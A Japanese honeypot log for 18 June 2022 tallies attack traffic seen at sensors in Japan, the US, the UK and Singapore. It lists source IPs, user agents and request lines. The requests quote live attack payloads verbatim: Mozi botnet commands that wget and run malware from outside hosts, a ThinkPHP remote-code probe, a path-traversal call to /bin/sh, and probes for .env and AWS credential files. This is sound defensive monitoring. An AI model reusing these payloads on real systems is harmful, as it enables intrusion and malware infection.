ハニーポット(仮) 観測記録 2022/06/18分です。
特徴
共通
Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
/.awsへのスキャン行為
/.envへのスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為
Location:JP
D-link製品の脆弱性を狙うアクセス
zgrabによるスキャン行為
.jsへのスキャン行為
110.242.68.4に関する不正通信
を確認しました。
Location:US
D-link製品の脆弱性を狙うアクセス
110.242.68.4に関する不正通信
Gh0stRATのような動き
UserAgentがHello, Worldであるアクセス
を確認しました。
Location:UK
D-link製品の脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
zgrabによるスキャン行為
phpMyAdminへのスキャン行為
110.242.68.4に関する不正通信
UserAgentがHello, Worldであるアクセス
を確認しました。
Location:SG
zgrabによるスキャン行為
/.gitへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget http://192.168.1.1:8088/Mozi.a; chmod 777 Mozi.a; /tmp/Mozi.a jaws
他
アクセス数推移
JP:総アクセス数:98 (前日比:-38)
US:総アクセス数:112 (前日比:56)
UK:総アクセス数:152 (前日比:108)
SG:総アクセス数:82 (前日比:15)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 1.85.218.187 | China |
1 | 1.202.112.160 | China |
1 | 5.252.194.39 | Russia |
1 | 36.106.166.3 | China |
1 | 36.106.167.239 | China |
1 | 51.120.49.111 | United Kingdom |
7 | 52.165.163.244 | United States |
1 | 59.52.179.148 | China |
1 | 62.197.136.92 | Netherlands |
1 | 62.233.50.179 | Russia |
3 | 89.248.165.52 | United Kingdom |
16 | 95.214.235.205 | Ukraine |
1 | 104.217.249.182 | United States |
1 | 110.52.194.219 | China |
1 | 112.80.137.149 | China |
1 | 112.80.137.220 | China |
1 | 112.80.139.151 | China |
1 | 116.1.255.62 | China |
1 | 118.81.12.139 | China |
1 | 123.145.8.193 | China |
1 | 123.160.175.113 | China |
1 | 123.245.25.133 | China |
1 | 124.31.106.164 | China |
1 | 124.31.107.148 | China |
10 | 124.158.184.177 | Indonesia |
1 | 125.36.255.163 | China |
8 | 135.125.217.54 | France |
7 | 135.125.246.189 | France |
1 | 137.184.226.45 | United States |
1 | 137.184.234.114 | United States |
1 | 167.172.247.109 | United States |
1 | 171.34.178.95 | China |
1 | 172.104.242.173 | United States |
1 | 175.152.28.40 | China |
11 | 185.7.214.104 | Hong Kong |
1 | 192.241.204.132 | United States |
1 | 202.14.122.67 | India |
1 | 205.210.31.154 | United States |
1 | 209.201.15.190 | United States |
1 | 220.200.177.117 | China |
3 | 222.186.19.205 | China |
UserAgent一覧
件数 | UserAgent |
---|---|
8 | - |
2 | Go-http-client/1.1 |
1 | Mozila/5.0 |
12 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 |
11 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36 |
43 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
1 | Mozilla/5.0 zgrab/0.x |
1 | Mozilla/5.01682558 Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/537.36(KHTML, like Gecko) Chrome/40.0.2214.89 Safari/537.36 |
1 | Mozilla/5.01694878 Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.2) Gecko/20100115 Firefox/3.6 GTBDFff GTB7.0 |
9 | Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 |
6 | PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
3 | - |
||
1 | \x03 |
||
1 | \x16\x03\x01 |
||
2 | CONNECT | cn[.]bing[.]com:443 |
HTTP/1.1 |
1 | CONNECT | hotmail-com.olc[.]protection[.]outlook[.]com:25 |
HTTP/1.1 |
2 | CONNECT | qzone-music[.]qq[.]com:443 |
HTTP/1.1 |
2 | CONNECT | www[.]baidu[.]com:443 |
HTTP/1.1 |
1 | CONNECT | www[.]so[.]com:443 |
HTTP/1.1 |
1 | CONNECT | www[.]voanews[.]com:443 |
HTTP/1.1 |
1 | GET | /.aws/credentials |
HTTP/1.1 |
1 | GET | /.env.bak |
HTTP/1.1 |
38 | GET | /.env |
HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
1 | GET | /ReportServer |
HTTP/1.1 |
1 | GET | /_ignition/execute-solution |
HTTP/1.1 |
1 | GET | /_profiler/phpinfo |
HTTP/1.1 |
1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
1 | GET | /aws.yml |
HTTP/1.1 |
1 | GET | /conf/.env |
HTTP/1.1 |
1 | GET | /config.js |
HTTP/1.1 |
1 | GET | /config/aws.yml |
HTTP/1.1 |
1 | GET | /console/ |
HTTP/1.1 |
1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 |
HTTP/1.1 |
1 | GET | /info.php |
HTTP/1.1 |
1 | GET | /library/.env |
HTTP/1.1 |
1 | GET | /new/.env |
HTTP/1.1 |
1 | GET | /phpinfo.php |
HTTP/1.1 |
1 | GET | /phpinfo |
HTTP/1.1 |
1 | GET | /script |
HTTP/1.1\n |
1 | GET | /solr/admin/info/system?wt=json |
HTTP/1.1 |
1 | GET | /vendor/.env |
HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | GET | /wp-admin/.env |
HTTP/1.1 |
1 | GET | /wp-content/.env |
HTTP/1.1 |
2 | GET | http[:]//dongtaiwang[.]com/ |
HTTP/1.1 |
1 | GET | http[:]//qzone-music.qq.com/fcg-bin/cgi_playlist_xml.fcg?uin=98156602&json=1&g_tk=1655435009 |
HTTP/1.1 |
2 | GET | http[:]//www[.]epochtimes[.]com/ |
HTTP/1.1 |
2 | GET | http[:]//www[.]minghui[.]org/ |
HTTP/1.1 |
2 | GET | http[:]//www[.]rfa[.]org/english/ |
HTTP/1.1 |
2 | GET | http[:]//www[.]soso[.]com/ |
HTTP/1.1 |
2 | GET | http[:]//www[.]wujieliulan[.]com/ |
HTTP/1.1 |
2 | HEAD | http[:]//110[.]242[.]68[.]4/ |
HTTP/1.1 |
1 | POST | /Autodiscover/Autodiscover.xml |
HTTP/1.1 |
1 | POST | /HNAP1/ |
HTTP/1.0 |
1 | POST | /HNAP1/ |
HTTP/1.1 |
1 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
Location:US
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 1.202.113.121 | China |
1 | 20.118.33.52 | United States |
1 | 20.226.29.120 | United States |
1 | 36.106.167.239 | China |
1 | 36.106.167.240 | China |
1 | 42.48.78.208 | China |
9 | 51.79.29.48 | Canada |
1 | 51.141.50.164 | United Kingdom |
1 | 58.19.45.74 | China |
1 | 58.246.212.213 | China |
1 | 60.13.138.170 | China |
1 | 60.17.124.62 | China |
1 | 62.233.50.179 | Russia |
1 | 66.240.205.34 | United States |
1 | 79.186.51.247 | Poland |
2 | 94.232.41.27 | Russia |
1 | 104.28.205.50 | United States |
1 | 104.217.249.182 | United States |
2 | 109.237.103.118 | Russia |
2 | 109.237.103.123 | Russia |
1 | 111.162.159.240 | China |
1 | 111.175.7.86 | China |
1 | 119.60.105.172 | China |
1 | 119.183.5.50 | China |
1 | 123.160.235.175 | China |
1 | 123.245.25.186 | China |
1 | 128.199.10.218 | United Kingdom |
1 | 139.170.203.76 | China |
1 | 139.170.203.113 | China |
1 | 139.226.59.59 | China |
33 | 141.95.91.126 | France |
1 | 141.98.9.13 | Lithuania |
1 | 162.142.125.211 | United States |
1 | 162.142.125.221 | United States |
1 | 164.68.116.9 | Germany |
1 | 167.94.138.63 | United States |
1 | 167.172.247.109 | United States |
1 | 175.152.29.50 | China |
1 | 175.152.32.213 | China |
1 | 180.95.231.170 | China |
1 | 180.126.201.96 | China |
1 | 183.191.31.114 | China |
12 | 185.7.214.104 | Hong Kong |
9 | 185.254.196.223 | Ukraine |
1 | 205.210.31.29 | United States |
1 | 220.250.11.13 | China |
1 | 222.94.140.26 | China |
3 | 222.186.19.205 | China |
UserAgent一覧
件数 | UserAgent |
---|---|
12 | - |
2 | Go-http-client/1.1 |
1 | Hello, World |
1 | Mozila/5.0 |
1 | Mozilla/4.01687919 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; Media Center PC 6.0) |
12 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0 |
12 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0 |
1 | Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 |
33 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36 |
1 | Mozilla/5.0 (Windows; U; Windows NT 5.2; eu) AppleWebKit/530.4 (KHTML, like Gecko) Chrome/2.0.172.0 Safari/530.4 |
24 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
2 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
8 | PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | Gh0st\xad |
||
4 | \x03 |
||
2 | \x16\x03\x01\x01D\x01 |
||
1 | \x16\x03\x01 |
||
2 | CONNECT | cn[.]bing[.]com:443 |
HTTP/1.1 |
2 | CONNECT | whois[.]pconline[.]com[.]cn:443 |
HTTP/1.1 |
2 | CONNECT | www[.]baidu[.]com:443 |
HTTP/1.1 |
2 | CONNECT | www[.]so[.]com:443 |
HTTP/1.1 |
2 | CONNECT | www[.]voanews[.]com:443 |
HTTP/1.1 |
1 | GET | /.aws/credentials |
HTTP/1.1 |
25 | GET | /.env |
HTTP/1.1 |
1 | GET | /83.118.68.34.bc.googleusercontent.com/.env |
HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
1 | GET | /_ignition/execute-solution |
HTTP/1.1 |
2 | GET | /actuator/gateway/routes |
HTTP/1.1 |
1 | GET | /admin/.env |
HTTP/1.1 |
1 | GET | /api/.env |
HTTP/1.1 |
1 | GET | /app/.env |
HTTP/1.1 |
1 | GET | /app/config/.env |
HTTP/1.1 |
1 | GET | /apps/.env |
HTTP/1.1 |
1 | GET | /audio/.env |
HTTP/1.1 |
1 | GET | /backend/.env |
HTTP/1.1 |
1 | GET | /base/.env |
HTTP/1.1 |
1 | GET | /blog/.env |
HTTP/1.1 |
1 | GET | /cgi-bin/.env |
HTTP/1.1 |
1 | GET | /conf/.env |
HTTP/1.1 |
1 | GET | /console/ |
HTTP/1.1 |
1 | GET | /core/.env |
HTTP/1.1 |
1 | GET | /crm/.env |
HTTP/1.1 |
1 | GET | /database/.env |
HTTP/1.1 |
1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 |
HTTP/1.1 |
1 | GET | /laravel/.env |
HTTP/1.1 |
1 | GET | /library/.env |
HTTP/1.1 |
1 | GET | /local/.env |
HTTP/1.1 |
1 | GET | /new/.env |
HTTP/1.1 |
1 | GET | /newsite/.env |
HTTP/1.1 |
1 | GET | /old/.env |
HTTP/1.1 |
1 | GET | /protected/.env |
HTTP/1.1 |
1 | GET | /public/.env |
HTTP/1.1 |
1 | GET | /sites/all/libraries/mailchimp/.env |
HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json |
HTTP/1.1 |
1 | GET | /src/.env |
HTTP/1.1 |
1 | GET | /storage/.env |
HTTP/1.1 |
1 | GET | /vendor/.env |
HTTP/1.1 |
1 | GET | /vendor/laravel/.env |
HTTP/1.1 |
2 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | GET | /wp-admin/.env |
HTTP/1.1 |
1 | GET | /wp-content/.env |
HTTP/1.1 |
1 | GET | /www/.env |
HTTP/1.1 |
2 | GET | http[:]//dongtaiwang[.]com/ |
HTTP/1.1 |
1 | GET | http[:]//whois[.]pconline[.]com[.]cn/jsFunction.jsp |
HTTP/1.1 |
2 | GET | http[:]//www[.]epochtimes[.]com/ |
HTTP/1.1 |
2 | GET | http[:]//www[.]minghui[.]org/ |
HTTP/1.1 |
1 | GET | http[:]//www[.]msftncsi[.]com/ncsi.txt |
HTTP/1.1 |
2 | GET | http[:]//www[.]rfa[.]org/english/ |
HTTP/1.1 |
2 | GET | http[:]//www[.]soso[.]com/ |
HTTP/1.1 |
2 | GET | http[:]//www[.]wujieliulan[.]com/ |
HTTP/1.1 |
2 | HEAD | http[:]//110[.]242[.]68[.]4/ |
HTTP/1.1 |
1 | POST | /Autodiscover/Autodiscover.xml |
HTTP/1.1 |
1 | POST | /GponForm/diag_Form?images/ |
HTTP/1.1 |
1 | POST | /HNAP1/ |
HTTP/1.0 |
2 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
1 | POST | /editBlackAndWhiteList |
HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
3 | PRI | * |
HTTP/2.0 |
Location:UK
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 20.213.245.145 | United States |
1 | 27.47.42.84 | China |
1 | 36.106.166.14 | China |
1 | 51.142.148.13 | United Kingdom |
1 | 62.233.50.179 | Russia |
1 | 83.143.86.62 | Norway |
1 | 103.133.110.227 | Vietnam |
1 | 104.217.249.182 | United States |
101 | 106.56.149.218 | China |
2 | 109.237.103.9 | Russia |
2 | 109.237.103.118 | Russia |
2 | 109.237.103.123 | Russia |
1 | 110.52.217.8 | China |
1 | 111.85.200.224 | China |
1 | 112.66.96.178 | China |
1 | 112.80.137.172 | China |
1 | 116.212.142.106 | Cambodia |
1 | 117.14.156.114 | China |
1 | 119.60.104.72 | China |
1 | 124.117.197.181 | China |
1 | 125.84.238.184 | China |
1 | 130.93.141.201 | France |
1 | 137.184.234.114 | United States |
2 | 157.230.216.203 | United States |
1 | 164.68.116.9 | Germany |
1 | 167.94.138.62 | United States |
1 | 170.210.45.163 | Argentina |
1 | 171.34.176.249 | China |
1 | 180.109.49.82 | China |
11 | 185.7.214.104 | Hong Kong |
1 | 192.241.208.69 | United States |
1 | 198.235.24.9 | United States |
1 | 198.235.24.158 | United States |
1 | 201.150.179.227 | Bolivia |
1 | 218.95.234.109 | China |
3 | 222.186.19.205 | China |
UserAgent一覧
件数 | UserAgent |
---|---|
13 | - |
2 | Go-http-client/1.1 |
1 | Hello, World |
2 | Java/1.8.0_333 |
6 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 |
101 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36 |
11 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.810.0 Safari/535.1 |
1 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36Mozilla/5.01732016 Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0 |
5 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
2 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
1 | Mozilla/5.0 zgrab/0.x |
4 | PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | MGLNDD_132.145.66.34_80\n |
||
1 | \x03 |
||
3 | \x16\x03\x01\x01D\x01 |
||
2 | \x16\x03\x01 |
||
1 | CONNECT | api[.]tvup[.]cloud:443 |
HTTP/1.1 |
1 | CONNECT | cn[.]bing[.]com:443 |
HTTP/1.1 |
2 | CONNECT | opendata[.]baidu[.]com:443 |
HTTP/1.1 |
1 | CONNECT | www[.]baidu[.]com:443 |
HTTP/1.1 |
1 | CONNECT | www[.]google[.]com:443 |
HTTP/1.1 |
1 | CONNECT | www[.]so[.]com:443 |
HTTP/1.1 |
1 | CONNECT | www[.]voanews[.]com:443 |
HTTP/1.1 |
1 | GET | /.aws/credentials |
HTTP/1.1 |
4 | GET | /.env |
HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
1 | GET | /_ignition/execute-solution |
HTTP/1.1 |
1 | GET | /ab2g |
HTTP/1.1 |
1 | GET | /ab2h |
HTTP/1.1 |
1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
1 | GET | /console/ |
HTTP/1.1 |
1 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 |
HTTP/1.1 |
101 | GET | /phpmyadmin/ |
HTTP/1.1 |
1 | GET | /script |
HTTP/1.1\n |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//116[.]212[.]142[.]106:44324/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 |
HTTP/1.0 |
1 | GET | /solr/admin/info/system?wt=json |
HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | GET | http[:]//dongtaiwang[.]com/ |
HTTP/1.1 |
1 | GET | http[:]//opendata[.]baidu[.]com/api.php?query=132.145.66.34&co=&resource_id=11409&oe=utf8 |
HTTP/1.1 |
1 | GET | http[:]//www[.]epochtimes[.]com/ |
HTTP/1.1 |
1 | GET | http[:]//www[.]minghui[.]org/ |
HTTP/1.1 |
1 | GET | http[:]//www[.]rfa[.]org/english/ |
HTTP/1.1 |
1 | GET | http[:]//www[.]soso[.]com/ |
HTTP/1.1 |
1 | GET | http[:]//www[.]wujieliulan[.]com/ |
HTTP/1.1 |
2 | HEAD | http[:]//110[.]242[.]68[.]4/ |
HTTP/1.1 |
1 | POST | /Autodiscover/Autodiscover.xml |
HTTP/1.1 |
1 | POST | /GponForm/diag_Form?images/ |
HTTP/1.1 |
1 | POST | /HNAP1/ |
HTTP/1.0 |
2 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
1 | POST | /mgmt/tm/util/bash |
HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | PRI | * |
HTTP/2.0 |
Location:SG
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 18.221.11.183 | United States |
2 | 20.239.48.140 | United States |
14 | 51.79.29.48 | Canada |
3 | 51.89.199.120 | France |
1 | 52.65.12.205 | United States |
7 | 52.165.163.244 | United States |
4 | 71.6.135.131 | United States |
1 | 72.52.69.145 | United States |
3 | 89.248.165.52 | United Kingdom |
1 | 104.217.249.182 | United States |
2 | 109.237.103.9 | Russia |
2 | 109.237.103.118 | Russia |
2 | 109.237.103.123 | Russia |
1 | 115.60.59.188 | China |
1 | 120.85.92.141 | China |
1 | 128.199.10.218 | United Kingdom |
1 | 137.184.226.45 | United States |
2 | 157.230.216.203 | United States |
1 | 162.142.125.219 | United States |
1 | 167.172.247.109 | United States |
2 | 176.107.176.83 | Ukraine |
2 | 180.214.236.54 | Vietnam |
11 | 185.7.214.104 | Hong Kong |
8 | 185.254.196.223 | Ukraine |
1 | 192.241.219.53 | United States |
1 | 192.241.221.238 | United States |
1 | 198.235.24.145 | United States |
1 | 200.58.93.165 | Bolivia |
1 | 205.210.31.146 | United States |
3 | 222.186.19.205 | China |
UserAgent一覧
件数 | UserAgent |
---|---|
19 | - |
2 | Go-http-client/1.1 |
1 | Hello, world |
2 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36 |
11 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Safari/535.1 |
40 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
1 | Mozilla/5.0 zgrab/0.x |
1 | python-requests/2.22.0 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
2 | - |
||
1 | MGLNDD_13.67.44.234_80 |
||
3 | \x16\x03\x01\x01D\x01 |
||
1 | \x16\x03\x01\x02 |
||
3 | \x16\x03\x01 |
||
1 | CONNECT | hotmail-com.olc[.]protection[.]outlook[.]com:25 |
HTTP/1.1 |
2 | CONNECT | opendata[.]baidu[.]com:443 |
HTTP/1.1 |
1 | GET | /.aws/credentials |
HTTP/1.1 |
35 | GET | /.env |
HTTP/1.1 |
2 | GET | /.git/config |
HTTP/1.1 |
1 | GET | /.well-known/security.txt |
HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
1 | GET | /ReportServer |
HTTP/1.1 |
1 | GET | /_ignition/execute-solution |
HTTP/1.1 |
1 | GET | /ab2g |
HTTP/1.1 |
1 | GET | /ab2h |
HTTP/1.1 |
1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
1 | GET | /boaform/admin/formLogin?username=admin&psd=admin |
HTTP/1.0 |
1 | GET | /boaform/admin/formLogin?username=user&psd=user |
HTTP/1.0 |
1 | GET | /conf/.env |
HTTP/1.1 |
1 | GET | /console/ |
HTTP/1.1 |
1 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 |
HTTP/1.1 |
1 | GET | /library/.env |
HTTP/1.1 |
1 | GET | /new/.env |
HTTP/1.1 |
1 | GET | /robots.txt |
HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws |
HTTP/1.1 |
1 | GET | /sitemap.xml |
HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json |
HTTP/1.1 |
1 | GET | /vendor/.env |
HTTP/1.1 |
2 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | GET | /wp-admin/.env |
HTTP/1.1 |
1 | GET | /wp-content/.env |
HTTP/1.1 |
1 | GET | http[:]//opendata[.]baidu[.]com/api.php?query=13.67.44.234&co=&resource_id=46385&oe=utf8 |
HTTP/1.1 |
1 | POST | /Autodiscover/Autodiscover.xml |
HTTP/1.1 |
1 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | PRI | * |
HTTP/2.0 |